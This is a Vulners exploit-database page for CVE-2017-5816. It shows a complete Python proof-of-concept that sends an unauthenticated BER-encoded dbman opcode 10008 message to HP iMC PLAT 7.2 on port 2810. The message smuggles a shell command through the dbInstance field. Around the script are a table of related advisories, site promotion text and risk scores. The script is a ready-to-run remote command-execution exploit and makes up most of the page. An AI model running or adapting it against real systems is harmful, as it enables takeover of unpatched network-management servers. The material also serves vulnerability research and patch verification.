Vulners
Lucene search
HP iMC Plat 7.2 - Remote Code Execution (2)
| Reporter | Title | Published | Views | Family All 22 |
|---|---|---|---|---|
 | HP iMC Plat 7.2 - Remote Code Execution Exploit (2) | 2 Dec 201700:00 | – | zdt |
| HPE iMC dbman RestartDB Unauthenticated Remote Command Execution Exploit | 10 Jan 201800:00 | – | zdt |
 | CVE-2017-5816 | 29 Nov 201700:00 | – | circl |
 | HPE Intelligent Management Center PLAT Arbitrary Code Execution Vulnerability (CNVD-2017-07183) | 18 May 201700:00 | – | cnvd |
 | HPE Intelligent Management Center dbman RestartDB Command Injection (CVE-2017-5816) | 28 Jun 201700:00 | – | checkpoint_advisories |
 | CVE-2017-5816 | 15 Feb 201822:00 | – | cve |
 | CVE-2017-5816 | 15 Feb 201822:00 | – | cvelist |
 | HPE iMC - dbman 'RestartDB' Remote Command Execution (Metasploit) | 10 Jan 201800:00 | – | exploitdb |
 | HP iMC Plat 7.2 - Remote Code Execution (2) | 29 Nov 201700:00 | – | exploitpack |
 | H3C / HPE Intelligent Management Center PLAT < 7.3 E0504P04 Multiple Vulnerabilities | 19 Jun 201700:00 | – | nessus |
10
#!/opt/local/bin/python2.7
# Exploit Title: HP iMC Plat 7.2 dbman Opcode 10008 Command Injection RCE
# Date: 11-29-2017
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: www.hpe.com
# Software Link: https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=16759&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber=
# Version: iMC PLAT v7.2 (E0403) Standard
# Tested on: Windows Server 2008 R2 Enterprise 64-bit
# CVE : CVE-2017-5816
# See Also: http://www.zerodayinitiative.com/advisories/ZDI-17-340/
# note that this PoC will create a file 'C:\10008.txt'
from pyasn1.type.univ import *
from pyasn1.type.namedtype import *
from pyasn1.codec.ber import encoder
import struct
import binascii
import socket, sys
ip = '192.168.1.74'
port = 2810
payload = "whoami > C:\\10008.txt"
opcode = 10008
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))
class DbmanMsg(Sequence):
componentType = NamedTypes(
NamedType('dbIp', OctetString()),
NamedType('iDBType', Integer()),
NamedType('dbInstance', OctetString()),
NamedType('dbSaUserName', OctetString()),
NamedType('dbSaPassword', OctetString()),
NamedType('strOraDbIns', OctetString())
)
msg = DbmanMsg()
msg['dbIp'] = ip
msg['iDBType'] = 4
msg['dbInstance'] = "a\"& " + payload + " &"
msg['dbSaUserName'] = "b"
msg['dbSaPassword'] = "c"
msg['strOraDbIns'] = "d"
encodedMsg = encoder.encode(msg, defMode=True)
msgLen = len(encodedMsg)
values = (opcode, msgLen, encodedMsg)
s = struct.Struct(">ii%ds" % msgLen)
packed_data = s.pack(*values)
sock.send(packed_data)
sock.close()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Nov 2017 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 39.8
CVSS 210
EPSS0.89949